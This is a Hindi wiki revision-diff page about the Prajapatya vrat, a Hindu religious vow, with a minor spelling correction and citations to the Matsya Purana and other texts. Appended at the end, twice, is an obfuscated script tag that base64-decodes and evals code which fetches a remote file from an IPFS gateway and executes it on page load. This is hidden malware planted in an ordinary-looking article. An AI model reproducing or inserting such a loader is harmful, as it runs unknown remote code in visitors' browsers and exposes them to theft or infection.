Difference between revisions of "प्राजापत्य व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - "उल्लखित" to "उल्लिखित")
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*जो व्यक्ति कृच्छ प्रायश्चित के अन्त में गोदान करता है और अपने सामर्थ्य के अनुसार ब्रह्मभोज कराता है, वह [[शंकर]] जी के लोक में पहुँचता है।<ref>[[मत्स्य पुराण]] (101-66)</ref>; <ref>कृत्यकल्पतरु (व्रत 448)</ref>; <ref>हेमाद्रि (व्रतखण्ड 2, 883, [[पद्म पुराण]] से उद्धरण)</ref>, <ref>कृत्यकल्पतरु (व्रतखण्ड) में यही 44वाँ षष्टिव्रत है</ref>
 
*जो व्यक्ति कृच्छ प्रायश्चित के अन्त में गोदान करता है और अपने सामर्थ्य के अनुसार ब्रह्मभोज कराता है, वह [[शंकर]] जी के लोक में पहुँचता है।<ref>[[मत्स्य पुराण]] (101-66)</ref>; <ref>कृत्यकल्पतरु (व्रत 448)</ref>; <ref>हेमाद्रि (व्रतखण्ड 2, 883, [[पद्म पुराण]] से उद्धरण)</ref>, <ref>कृत्यकल्पतरु (व्रतखण्ड) में यही 44वाँ षष्टिव्रत है</ref>
  

Revision as of 18:10, 25 February 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • jo vyakti krichchh prayashchit ke ant mean godan karata hai aur apane samarthy ke anusar brahmabhoj karata hai, vah shankar ji ke lok mean pahuanchata hai.[1]; [2]; [3], [4]


tika tippani aur sandarbh

  1. matsy puran (101-66)
  2. krityakalpataru (vrat 448)
  3. hemadri (vratakhand 2, 883, padm puran se uddharan)
  4. krityakalpataru (vratakhand) mean yahi 44vaan shashtivrat hai

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>